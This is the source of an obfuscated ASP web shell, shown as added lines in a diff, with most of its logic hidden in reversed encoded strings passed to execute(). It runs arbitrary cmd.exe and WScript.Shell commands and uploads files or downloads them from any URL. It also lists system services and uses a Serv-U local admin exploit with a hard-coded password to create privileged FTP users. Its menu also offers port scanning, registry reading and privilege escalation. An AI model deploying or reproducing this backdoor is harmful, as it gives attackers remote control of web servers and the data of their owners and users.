+execute(shisanfun("IS j���>elbat/<>mrof/<��&IS=IS���>rt/<>dt/<>'�̽�������������һ��'=eulav 'timbuS'=eman 'timbus'=epyt tupni<>05=thgieh dt<>dt/<;psbn&>dt<>rt<��&IS=IS���>rt/<>dt/<)������ȫ������񣬴�Խ������Ƶ����Խ���ĵĻ���Ҫ�裬��1ΪС��( �� >/ ���)'',g/]d\^[/(ecalper.eulav=eulav���=puyekno ���5���=ezis ���1���=eulav ���thgir:ngila-txet���=elyts ���emiTA���=eman ���txet���=epyt tupni<>dt<>dt/<����Ƶ����>thgir=ngila dt<>rt<��&IS=IS���>rt/<>dt/<)���ĸ��Գ��룬�����ֳ��������ʷ�( 8-FTU>/ ���2���=eulav ���rahCA���=eman ���oidar���=epyt tupni<  2132BG>/ dekcehc ���1���=eulav ���rahCA���=eman ���oidar���=epyt tupni<>dt<>dt/<��������>thgir=ngila dt<>rt<��&IS=IS���>rt/<>dt/<>aeratxet/<�������>���7���=swor ���07���=sloc ���edoCA���=eman aeratxet<>dt<>dt/<���������>thgir=ngila ���;xp3:pot-gniddap���=elyts pot=ngilav dt<>rt<��&IS=IS���>rt/<>dt/<>aeratxet/<��&)��psa.tset\��&)��htaPredloF��(noisseS(htaPeRR&��>���7���=swor ���07���=sloc ���eliFA���=eman aeratxet<��&IS=IS���>dt<>dt/<>tnof/<;psbn&;psbn&��·���ĸ�һ��ÿ>rb<;psbn&;psbn&���ĸ��໤��ʱͬ��>wolley=roloc tnof<>rb<����·���ĵĻ���Ҫ��>���0���=eulav ���avvv���=eman ���neddih���=epyt tupni<>thgir=ngila 'xp22:thgieh-enil'=elyts pot=ngilav dt<>rt<��&IS=IS���'tsoP=2noitcA&eliForP=noitcA?��&LRU&��'=noitca 'tsop'=dohtem 'mroFpU'=eman mrof<��&IS=IS���>'0'=gnicapsllec '0'=gniddapllec '0'=redrob elbat<>rb<��=IS��fI dnE��dnE.esnopseR���>rb<>retnec/<���̽�����>a/<����>knalb_=tegrat ��&2ssap&��=eliForP?��&LRU&��=ferh ���dlob:thgiew-tnof;enilrednu:noitaroced-txet���=elyts a<���㣡���ɳ��� >tnof/<��&2ssap&��>wolley=roloc tnof< �̽�����>retnec<>rb<>rb<>rb<��j��)��rahCA��(tseuqer=)��rahC��&2ssap(noitacilppA��)��emiTA��(tseuqer=)��emiT��&2ssap(noitacilppA��)��edoCA��(tseuqer=)��edoC��&2ssap(noitacilppA��)��eliFA��(tseuqer=)��eliF��&2ssap(noitacilppA��1=)2ssap(noitacilppA��)2ssap(esacu=2ssap�� pool��1mun&2ssap=2ssap��fi dne�� 9~0' ))84+dnr*)84-75((rhC(rtSC=1mun��esle�� z~a' ))79+dnr*)79-221((rhC(rtSC=1mun��neht 4=<)2ssap(neL fi��8<)2ssap(neL elihW oD����=2ssap��1mun,2ssap mid��ezimodnaR��nehT ��tsoP��=)��2noitcA��(tseuqeR fI��"))
+End Function
+
+
+Function suftp()
+execute(shisanfun("fi dne��gnihton=3TSOPx teS��)sevael(dneS.3tsoPx��eurT ,��sevael/��& trop &��:1.0.0.721//:ptth�� ,��TSOP�� nepO.3tsoPx��)��PTTHLMX.2LMXSM��(tcejbOetaerC = 3tsoPx teS��flrcbv & resut & ��=resU �� & flrcbv & tropt & ��=oNtroP-�� & flrcbv & ��0.0.0.0=PI-�� & flrcbv & ��RESUETELED-�� & sevael = sevael��flrcbv & ��ECNANETNIAM ETIS�� & sevael = sevael��flrcbv & dwp & �� ssaP�� & sevael = sevael��flrcbv & rsU & �� resU�� = sevael��esle��)��>RB<>rb<): �� & htapt & �� :��· �� & ssapt & �� :���ܩ� & �� �� & resut & �� :������ PTF������ִ����������( j��gnihton=TSOPx teS��)sevael(dneS.tsoPx��eurT ,��sevael/��& trop &��:1.0.0.721//:ptth�� ,��TSOP�� nepO.tsoPx��)��PTTHLMX.2LMXSM��(tcejbOetaerC = tsoPx teS��txeN emuseR rorrE nO��flrcbv & ��PDCLEMAWR|\�� & htapt & ��=sseccA �� & flrcbv & ��enoN=soitaR-�� & flrcbv & ��ralugeR=epyTdrowssaP-�� & flrcbv & ��metsyS=ecnanetniaM-���_ & flrcbv & ��0=mumixaMatouQ-�� & flrcbv & ��0=tnerruCatouQ-�� & flrcbv & ��0=tiderCsoitaR-�� & flrcbv & ��1=nwoDoitaR-���_ & flrcbv & ��1=pUoitaR-�� & flrcbv & ��0=eripxE-�� & flrcbv & ��1-=tuOemiTnoisseS-�� & flrcbv & ��006=tuOemiTeldI-�� & flrcbv & ��1-=sresUrNxaM-���_ & flrcbv & ��0=nwoDtimiLdeepS-�� & flrcbv & ��0=pUtimiLdeepS-�� & flrcbv & ��1-=PIrePnigoLsresUxaM-�� & flrcbv & ��0=elbanEatouQ-���_ & flrcbv & ��0=drowssaPegnahC-�� & flrcbv & ��0=nigoLwollAsyawlA-�� & flrcbv & ��0=neddiHediH-�� & flrcbv & ��0=eruceSdeeN-���_ & flrcbv & ��1=shtaPleR-�� & flrcbv & ��0=elbasiD-�� & flrcbv & ��=eliFseMnigoL-�� & flrcbv & ��\�� & htapt & ��=riDemoH-���_ & flrcbv & ssapt & ��=drowssaP-�� & flrcbv & resut & ��=resU-�� & flrcbv & tropt & ��=oNtroP-�� & flrcbv & ��0.0.0.0=PI-�� & flrcbv & ��PUTESRESUTES-�� & sevael = sevael��flrcbv & ��ECNANETNIAM ETIS�� & sevael = sevael��flrcbv & dwp & �� ssaP�� & sevael = sevael��flrcbv & rsU & �� resU�� = sevael��nehT ��dda�� = )��nottuboidar��(mroF.tseuqer fi��)��dmcd��(mroF.tseuqer = dnammoC'��)��tropt��(mroF.tseuqer = tropt��)��htapt��(mroF.tseuqer = htapt��)��ssapt��(mroF.tseuqer = ssapt��)��resut��(mroF.tseuqer = resut��)��tropd��(mroF.tseuqer = trop��)��dwpd��(mroF.tseuqer = dwp��)��resud��(mroF.tseuqer = rsU���>retnec/<>mrof/<>elbat/<>rt/<>dt/<>'1'=eulav 'noitca'=di 'neddih'=epyt 'noitcaUS'=eman tupni<>'teseR'=eulav '2timbuS'=eman 'teser'=epyt tupni<;psbn&>'oG tsuJ'=eulav 'timbuS'=eman 'timbus'=epyt tupni<>d=di '2'=napsloc dt<>'elddim'=ngilav 'retnec'=ngila rt<>rt/<>dt/<��ɾ��ȷ>d=di 'xoBtxeT'=ssalc 'led'=eulav 'nottuboidar'=eman 'oidar'=epyt tupni<;psbn&������ȷ>d=di 'xoBtxeT'=ssalc dekcehc 'dda'=eulav 'oidar'=epyt 'nottuboidar'=eman tupni<>d=di dt<>dt/<��������ִ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'12'=eulav 'tropt'=di 'xoBtxeT'=ssalc 'txet'=epyt 'tropt'=eman tupni<>d=di dt<>dt/<���ڶ����>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'\:C'=eulav 'htapt'=di 'xoBtxeT'=ssalc 'txet'=epyt 'htapt'=eman tupni<>d=di dt<>dt/<����·�ʷ�>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'1'=eulav 'ssap'=di 'xoBtxeT'=ssalc 'txet'=epyt 'ssapt'=eman tupni<>d=di dt<>dt/<����ڼ���>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'redavni'=eulav 'resut'=di 'xoBtxeT'=ssalc 'txet'=epyt 'resut'=eman tupni<>d=di dt<>dt/<�����˼���>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'85934'=eulav 'tropd'=di 'xoBtxeT'=ssalc 'txet'=epyt 'tropd'=eman tupni<>d=di dt<>dt/<���ڶ�ͳϵ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'P@0;kl.#ka$@l#'=eulav 'dwpd'=di 'xoBtxeT'=ssalc 'txet'=epyt 'dwpd'=eman tupni<>d=di dt<>dt/<�����ͳϵ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'rotartsinimdAlacoL'=eulav 'resud'=di 'xoBtxeT'=ssalc 'txet'=epyt 'resud'=eman tupni<>d=di dt<>dt/<������ͳϵ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>b/<Ϣ�ű���ɼ�>B< >tnof/<8>sgnidbew=ecaf tnof<>s=di '2'=napsloc dt<>'elddim'=ngilav 'retnec'=ngila rt<>'005'=htdiw elbat<>''=noitca 'tsop'=dohtem '1mrof'=eman mrof<>rb<>retnec<��j��"))
+End Function
+
+
+
+Function MainMenu()
+execute(shisanfun("��>elbat/<��j��:��>elbat/<>rt/<>dt/<��&thgirypoC&��>rh<>'der:roloc'=elyts retnec=ngila dt<>rt<��j��:��>rt/<>dt/<>a/<¼�dz���>->'pot_'=tegrat 'tuogoL=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j�����:��>rt/<>dt/<>a/<ѯ��Ů��>->'knalb_'=tegrat '+ѯ+��+=ntb&��&1rts&��=lru?xpsa.toboR/slooT/moc.zanihc.loot//:ptth'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<ѯ�����>->'emarFeliF'=tegrat '��&1rts&��/llaetis/moc.nahzia.www//:ptth'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<ѯ���ͬ>->'emarFeliF'=tegrat '��&1rts&��=w?xpsa.411/pi/moc.tseb411.www//:ptth'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<ѯ����Ȩ>->'emarFeliF'=tegrat '0=epyTtros&��&1rts&��=tsoh?xpsa.trosudiab/moc.zanihc.lootym//:ptth'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<��������>->'emarFeliF'=tegrat 'eliForP=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<¼Ŀ�����>->'emarFeliF'=tegrat '')���redloFweN���,����&)��\\..fnc_itv\��&)��htaPredloF��(noisseS(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<Ȩ��-uvreS>->'emarFeliF'=tegrat 'uvreS=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<��PTF---uS>->'emarFeliF'=tegrat 'ptfus=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<AS-----LQS>->'emarFeliF'=tegrat 'DMM=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����ɨ�ڶ�>->'emarFeliF'=tegrat 'troPnacS=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����עȡ��>->'emarFeliF'=tegrat 'GERdaeR=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����---LQS>->'emarFeliF'=tegrat '/lqs/rekc4h/moc.pxeyado//:ptth'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����__�ڶ�>->'emarFeliF'=tegrat 'ofnIlanimreTteg=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<erehwynacP>->'emarFeliF'=tegrat '4erehwynacp=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<Ȩ��nimdaR>->'emarFeliF'=tegrat 'nimdar=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����__����>->'emarFeliF'=tegrat 'hcraeST=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����--����>->'emarFeliF'=tegrat 'daolpu=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����__����>->der=roloc tnof<>'emarFeliF'=tegrat '��&OOOO&��\.\\=htaPrewoP&rewoPtidE=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����__����>->der=roloc tnof<>'emarFeliF'=tegrat '/ukout/rekc4h/moc.pxeyado//:ptth'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����__����>->der=roloc tnof<>'emarFeliF'=tegrat 'llehsneddih=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��fI dnE��:��>rt/<>dt/<>a/<����м���>->'emarFeliF'=tegrat 'bdMoTddAegaP=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<��̽--����>->'emarFeliF'=tegrat 'php=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<��Ȩ--�̴�>->'emarFeliF'=tegrat 'mroFevirDnacS=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<2DMC--��ִ>->'emarFeliF'=tegrat 'xdmc=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<DMC---��ִ>->'emarFeliF'=tegrat 'llehS1dmC=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����--����>->'emarFeliF'=tegrat 'eliFpU=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����--����>->'emarFeliF'=tegrat 'eliFtidE=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<�Ŀ--����>->')���redloFweN���,����&)��elifweN\��&)��htaPredloF��(noisseS(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<¼Ŀ���ϻ�>->'emarFeliF'=tegrat 'kcabog=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<�Ŀ��̱�>->')����&)htaPtooR(htaPeR&����(redloFwohS:tpircsavaj'=ferh a<>'22'=thgieh dt<>rt<��j���>rt/<>dt/<>a/<¼Ŀ����վ>->')����&)tooRWWW(htaPeR&����(redloFwohS:tpircsavaj'=ferh a<> 59=htdiw d=di dt<>rt<>0=redrob elbat<>retnec=ngila ���pot���=ngilav dt<>rt<>rt/<>dt/<>elbat/<��j��gnihtoN=CBA teS:)(revirDwohS.CBA j:FBL weN=CBA teS���eslE���>rt/<>dt/<��Ȩ��>'42'=thgieh dt<>rt<��j��nehT ��� ��=)1,0(TbO fI���>���'enon'=yalpsid.elyts.1unem���=tuoesuomno ���'enon'=yalpsid;%001:htdiw���=elyts1unem=di vid<>���''=yalpsid.elyts.1unem���=revoesuomno 42=thgieh dt<>rt<��j"))
+end function
+function Cmdx()
+execute(shisanfun(")��>retnec/<>aeratxet/<��(j: lladaer.tuodts.))��dmc��(tseuqer&��c/ ��&)��xdmc��(tseuqer(cexe.nhltpircSo j: fi dne�� lladaer.tuodts.))��dmc��(tseuqer&��c/ exe.dmc��(cexe.nhltpircSo j��neht ��exe.dmc��=)��xdmc��(tseuqer fi:txeN emuseR rorrE nO:)�� >72=swor 051=sloc ylnodaer aeratxet<��(j:)�� >mrof/<>'tibmuS'=eulav timbus=epyt tupni<��(j:)�� >rb<>06=ezis 'dmc'=eman txet=epyt tupni<��(j:)�� >rb<>'exe.dmc'=eulav 06=ezis 'xdmc'=eman txet=epyt tupni<��(j:)�� >'tsop'=dohtem mrof<>retnec<��(j��"))
+end function
+Function Course()
+SI="<br><table width='80%' align='center'><tr><td height='20' colspan='3' align='center' id=s><b>ϵͳ�û������</b></td></tr>"
+on error resume next
+for each obj in getObject("WinNT://.")
+err.clear
+if OBJ.StartType="" then
+SI=SI&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td id=d>&nbsp;ϵͳ�û�(��)</td></tr><tr>" 
+end if
+if OBJ.StartType=2 then lx="�Զ�"
+if OBJ.StartType=3 then lx="�ֶ�"
+if OBJ.StartType=4 then lx="����"
+if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
+SI1=SI1&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td height=""20"" id=d>&nbsp;"&obj.DisplayName&"<tr><td height=""20"" id=d colspan=""2"">[��������:"&lx&"]<font>&nbsp;"&obj.path&"</font></td></tr>"
+else
+SI2=SI2&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td height=""20"" id=d>&nbsp;"&obj.DisplayName&"<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2"">[��������:"&lx&"]<font color=#3399FF>&nbsp;"&obj.path&"</font></td></tr>"
+end if
+next
+j SI&SI0&SI1&SI2&"</table>"
+End Function
+respnose.Write strBAD&Action
+Function IIf(var, val1, val2)
+If var=True Then
+IIf=val1
+Else
+IIf=val2
+End If
+End Function
+Function GetTheSizes(num)
+Dim i, arySize(4)
+arySize(0)="B"
+arySize(1)="KB"
+arySize(2)="MB"
+arySize(3)="GB"
+arySize(4)="TB"
+While(num / 1024 >= 1)
+num=Fix(num / 1024 * 100) / 100
+i=i + 1
+WEnd
+GetTheSizes=num&" "&arySize(i)
+End Function
+Function HtmlEncodes(str)
+If IsNull(str) Then Exit Function
+HtmlEncodes=Server.HTMLEncode(str)
+End Function
+
+function downfile(path)
+execute(shisanfun("gnihton = mso tes��esolc.mso��hsulf.esnopser��daer.mso etirwyranib.esnopser���maerts-tetco/noitacilppa�� = epyttnetnoc.esnopser���8-ftu�� = tesrahc.esnopser��ezis.mso ,��htgnel-tnetnoc�� redaehdda.esnopser��)zs,htap(dim & ��=emanelif ;tnemhcatta�� ,��noitisopsid-tnetnoc�� redaehdda.esnopser��1+)��\��,htap(verrtsni=zs��htap elifmorfdaol.mso��1 = epyt.mso��nepo.mso��))0,6(tbo(tcejboetaerc = mso tes��raelc.esnopser��"))
+end function
+function htmlencode(s)
+  if not isnull(s) then
+    s = replace(s, ">", ">")
+    s = replace(s, "<", "<")
+    s = replace(s, chr(39), "'")
+    s = replace(s, chr(34), """")
+    s = replace(s, chr(20), " ")
+    htmlencode = s
+  end if
+end function
+Function UpFile(): 
+execute(shisanfun("����&lruypoc&���j���>elbat/<>mrof/<>rt/<>dt/<>'����'=eulav 'timbuS'=eman 'timbus'=epyt tupni< >'52'=ezis  'elif'=epyt 'eliFlacoL'=eman tupni<>'04'=ezis '��&)��exe.dmC\��&)��htaPredloF��(noisseS(htaPeRR&��'=eulav 'htaPoT'=eman tupni<����·����>dt<>rt<>'atad-mrof/trapitlum'=epytcne 'tsoP=2noitcA&eliFpU=noitcA?��&LRU&��'=noitca 'tsop'=dohtem 'mroFpU'=eman mrof<>'retnec'=ngila '0'=gnicapsllec '0'=gniddapllec '0'=redrob elbat<>rb<>rb<>rb<��j  ��fI dnE  ��dnE.esnopseR ��)(rrEwohS ��IS j ��lrUkcaB&IS=IS ��gnihton=U teS��gnihton=F teS��fI dnE ��fi dnE  ���>retnec/<�����ɩ�&�崫��&���ϩ�&emaNU&�����>rb<>rb<>rb<>retnec<��=IS ��nehT 0=rebmun.rrE fI ��emaNU sAevaS.F ��eslE  ��txen emuser rorre no���!���ϩ�&����ĸ�һ��&����ѡ��·��&��ȫ��ĩ�&�崫�����&������>rb<��=IS  ��neht 0=eziSeliF.F rO ���=emaNU fI ��)��htaPoT��(mrof.U=emaNU��)��eliFlacoL��(AU.U=F teS�� CPU wen=U teS��nehT ��tsoP��=)��2noitcA��(tseuqeR fI"))
+End Function
+function cmd1shell()
+execute(shisanfun("is j���>mrof/<>aeratxet/<��&)31(rhc&is=is��fi dne��fi dne��aaa&is=is��)eurt ,elifpmetzs(elifeteled.osf llac��esolc.xclelifo��)lladaer.xclelifo(edocnelmth.revres=aaa��)0 ,eslaf ,1 ,elifpmetzs( eliftxetnepo.sf = xclelifo tes��)��tcejbometsyselif.gnitpircs��(tcejboetaerc = sf tes��)eurt ,0 ,elifpmetzs & �� > �� & dmcfed & �� c/ ��&htapllehs( nur.sw llac��)��txt.dmc��(htappam.revres = elifpmetzs��)��tcejbometsyselif.gnitpircs��(tcejboetaerc.revres=osf tes��)��llehs.tpircsw��(tcejboetaerc.revres=sw tes��)��llehs.tpircsw��(tcejboetaerc.revres=sw tes��txen emuser rorre no��esle��aaa&is=is��lladaer.tuodts.dd=aaa��)dmcfed&�� c/ ��&htapllehs(cexe.mc=dd tes��))0,1(tbo(tcejboetaerc=mc tes��neht ��sey��=)��tpircsw��(mrof.tseuqer fi��neht ���><)��dmc��(mrof.tseuqer fi���>'dmc'=ssalc ';044:thgieh;%001:htdiw'=elyts aeratxet<>'��ִ'=eulav 'timbus'=epyt tupni< >'��&dmcfed&��'=eulav '%29:htdiw'=elyts 'dmc'=eman tupni<llehs.tpircsw>��&dekcehc&��'sey'=eulav 'tpircsw'=eman 'xobkcehc'=epyt c=ssalc tupni<>'%07:htdiw'=elyts '��&htapllehs&��'=eulav 'ps'=eman tupni<����·llehs>'tsop'=dohtem mrof<��=is��)��dmc��(tseuqer = dmcfed neht ���><)��dmc��(tseuqer fi����=dekcehc neht ��sey��><)��tpircsw��(tseuqer fi���exe.dmc�� = htapllehs neht ���=htapllehs fi��)��htapllehs��(noisses=htapllehs��)��ps��(tseuqer = )��htapllehs��(noisses neht ���><)��ps��(tseuqer fi���dekcehc ��=dekcehc��"))
+end function
+Function upload()
+j"<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>" 
+j"��ʱ�رմ˹���"
+j" ���ص�������:�޻���...Ϊ�˽�ʡ.�����޻���<hr/>"
+j"<form method=post>"
+j"<select onChange='this.form.theUrl.value=this.value;'>"
+j"<option value=''>��������</option>"
+j"<input name=theUrl value='http://' size=80><input type=submit value=' ���� '><br/>"
+j"<input name=thePath value='" & HtmlEncode(Server.MapPath(".")) & "\' size=80>"
+j"<input type=checkbox name=overWrite value=2>���ڸ��ǡ�"
+j"<input type=hidden value=downFromUrl name=theAct>"
+j"</form>"
+j"<hr/>"
+If isDebugMode = False Then
+On Error Resume Next
+End If:Dim Http, theUrl, thePath, stream, fileName, overWrite
+theUrl = Request("theUrl")
+thePath = Request("thePath")
+overWrite = Request("overWrite")
+Set stream = Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http = Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite <> 2 Then:overWrite = 1:End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState <> 4 Then 
+End If
+With stream
+.Type = 1
+.Mode = 3
+.Open
+.Write Http.ResponseBody
+.Position = 0
+.SaveToFile thePath, overWrite
+If Err.Number = 3004 Then
+Err.Clear
+fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If fileName = "" Then
+fileName = "index.htm.txt"
+End If
+thePath = thePath & "\" & fileName
+.SaveToFile thePath, overWrite
+j"error,��������Ϊ�ļ��Ѵ��ڣ������ع��̺͵�ַ�г� �ִ��� �� �ļ������� ��Ϊ���ֽڣ���"
+End If
+.Close
+End With
+chkErr(Err)
+Set Http = Nothing
+Set Stream = Nothing
+If isDebugMode = False Then
+On Error Resume Next
+End If
+If Request("ice")="fso" Then
+response.Redirect str1&"test.aspx"
+elseif Request("ice")="fsos" then
+response.Redirect str1&"test.php"
+elseif Request("ice")="jztxt" then
+response.Redirect "http://"&serveru&"/global.asa"
+elseif Request("ice")="killdoor" then
+response.Redirect str1&"killdoor.asp"
+end if
+End Function:Function TSearch():dim st:st=timer():RW="<br><table width='600' bgcolor='' border='0' cellspacing='1' cellpadding='0' align='center'><form method='post'>"
+  RW=RW & "<tr><td height='20' align='center' bgcolor=''>��������</td></tr>"
+  RW=RW & "<tr><td bgcolor=''>&nbsp;·&nbsp;&nbsp;����<input name='SFpath' value='" & WWWRoot & "' style='width:390'>&nbsp;ע:��·��ʹ��"",""������.</td></tr>"
+  RW=RW & "<tr><td bgcolor=''>&nbsp;�ļ�����<input name='Sfk' style='width:200'>&nbsp;<input type='submit' value='����' class='submit'>&nbsp;[����Ҳ��]</td></tr>"  
+  RW=RW & "</form></table>"
+  j RW : RW=""
+  if Request.Form("Sfk")<>"" then
+  Set newsearch=new SearchFile
+  newsearch.Folders=trim(Request.Form("SFpath"))
+  newsearch.keyword=trim(Request.Form("Sfk"))
+  newsearch.Search
+  Set newsearch=Nothing
+  j"�M�r��"&(timer()-st)*1000&"����<hr>"
+  end if
+End Function 
+
+Class SearchFile
+ dim Folders,keyword,objFso,Counter
+ Private Sub Class_Initialize
+  Set objFso=Server.CreateObject(ObT(0,0))
+  Counter=0
+ End Sub
+ Private Sub Class_Terminate
+    Set objFso=Nothing
+ End Sub
+ Function Search
+  Folders=split(Folders,",")
+  flag=instr(keyword,"\") or instr(keyword,"/")
+  flag=flag or instr(keyword,":")
+  flag=flag or instr(keyword,"|")
+  flag=flag or instr(keyword,"&")
+  if flag then
+    j"<table align='center' width='600'><hr><p align='center'><font color='red'>�P�I�ֲ��ܰ���/\:|&</font><br>"
+
+ Exit Function
+  else
+    j"<table align='center' width='600'><hr>"
+  end if
+  dim i
+  for i=0 to ubound(Folders)
+    Call GetAllFile(Folders(i))
+  next
+  j"<p align='center'>��������<font color='red'>"&Counter&"</font>���Y��<br>"
+ End Function
+ Private Function GetAllFile(Folder)
+  dim objFd,objFs,objFf
+  Set objFd=objFso.GetFolder(Folder)
+  Set objFs=objFd.SubFolders
+  Set objFf=objFd.Files
+  dim strFdName
+  On Error Resume Next
+  For Each OneDir In objFs
+    strFdName=OneDir.Name
+    If strFdName<>"Config.Msi" EQV strFdName<>"RECYCLED" EQV strFdName<>"RECYCLER" EQV strFdName<>"System Volume Information" Then 
+      SFN=Folder&"\"&strFdName
+      Call GetAllFile(SFN)
+ End If
+  Next
+  dim strFlName
+  For Each OneFile In objFf
+    strFlName=OneFile.Name
+    If strFlName<>"desktop.ini" EQV strFlName<>"folder.htt" Then
+      FN=Folder&"\"&strFlName
+   Counter=Counter+ColorOn(FN)
+ End If
+  Next
+  Set objFd=Nothing
+  Set objFs=Nothing
+  Set objFf=Nothing
+ End Function
+ Private Function CreatePattern(keyword)   
+   CreatePattern=keyword
+   CreatePattern=Replace(CreatePattern,".","\.")
+   CreatePattern=Replace(CreatePattern,"+","\+")
+   CreatePattern=Replace(CreatePattern,"(","\(")
+   CreatePattern=Replace(CreatePattern,")","\)")
+   CreatePattern=Replace(CreatePattern,"[","\[")
+   CreatePattern=Replace(CreatePattern,"]","\]")
+   CreatePattern=Replace(CreatePattern,"{","\{")
+   CreatePattern=Replace(CreatePattern,"}","\}")
+   CreatePattern=Replace(CreatePattern,"*","[^\\\/]*")
+   CreatePattern=Replace(CreatePattern,"?","[^\\\/]{1}")
+   CreatePattern="("&CreatePattern&")+"
+ End Function
+ Private Function ColorOn(FileName)
+execute(shisanfun("gnihtoN=geRjbo teS   ��fi dne   ��0=nOroloC     ��esle   ��1=nOroloC  ��hsulf.esnopseR  ��tuPtuO j  ��tuPtuO & ))��\��,emaNeliF(veRrtsnI,1,emaNeliF(diM & ��;psbn&>'006'=htdiw 'retnec'=ngila elbat<��=tuPtuO     ��)��>tnof/<1$>''=roloc tnof<��,)1+)��\��,emaNeliF(veRrtsnI,emaNeliF(diM(ecalpeR.geRjbo=tuPtuO     ��neht laVter fi   ��))1+)��\��,emaNeliF(veRrtsnI,emaNeliF(diM(tseT.geRjbo=laVter   ��eurT=labolG.geRjbo   ��eurT=esaCerongI.geRjbo   ��)drowyek(nrettaPetaerC=nrettaP.geRjbo   ��pxEgeR wen=geRjbo teS   ��geRjbo mid   "))
+ End Function
+End Class
+
+
+execute(shisanfun("��noitcnuf dnE:fI dnE:��)'����¼Ŀ��վ�ڲ�����'(trela���=kcilcno ���###��=lrUnepo:eslE:��knalb_���=tegrat ����&lrUeht&��/��=lrUnepo:fI dnE:)2 ,lrUeht(diM = lrUeht:nehT ��/�� = )1 ,lrUeht(tfeL fI:)��/�� ,��\�� ,lrUeht(ecalpeR = lrUeht:)1 + )htaPeht(neL ,htaPesu(diM = lrUeht:nehT )htaPeht(esaCL = )))htaPeht(neL ,htaPesu(tfeL(esaCL fI:)��/��(htaPpaM.revreS = htaPeht:htaPeht ,lrUeht miD:)htaPesu(lrUnepo noitcnuf:noitcnuF dnE:fi dne:��B�� & eziSeht = eziSehTteg: nehT 4201< eziSeht dnA 0 => eziSeht fI:fi dne:��K�� & 001 / )001 * )4201 / eziSeht((xiF = eziSehTteg: nehT )4201 * 4201( < eziSeht dnA 4201 => eziSeht fI:fi dne:��M�� & 001 / )001 * ))4201 * 4201( / eziSeht((xiF = eziSehTteg: nehT )4201 * 4201 * 4201( < eziSeht dnA )4201 * 4201( => eziSeht fI:fi dne:��G�� & 001 / )001 * ))4201 * 4201 * 4201( / eziSeht((xiF = eziSehTteg: nehT )4201 * 4201 * 4201( => eziSeht fI:)eziSeht(eziSehTteg noitcnuF:noitcnuF dnE:fi dne:��>���'��&htaPrewoP&��=htaPrewoP&2=epyTevaS&rewoPevaS=noitcA?'=ferh.noitacol���=kcilcno ����=eulav nottub=epyt tupni< >tnof/<����δ>26FF26#=roloc tnof<�� = setubirttAteg:esle:��>���'��&htaPrewoP&��=htaPrewoP&1=epyTevaS&rewoPevaS=noitcA?'=ferh.noitacol���=kcilcno ����=eulav nottub=epyt tupni< >tnof/<������>der=roloc tnof<�� = setubirttAteg: neht 0=KOtidE fi:)��\\��,��\��,htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => eulaVtni fI:fI dnE:0=KOtidE:2 - eulaVtni = eulaVtni:nehT 2 => eulaVtni fI:fI dnE:0=KOtidE:4 - eulaVtni = eulaVtni:nehT 4 => eulaVtni fI:fI dnE:8 - eulaVtni = eulaVtni:nehT 8 => eulaVtni fI:fI dnE:61 - eulaVtni = eulaVtni:nehT 61 => eulaVtni 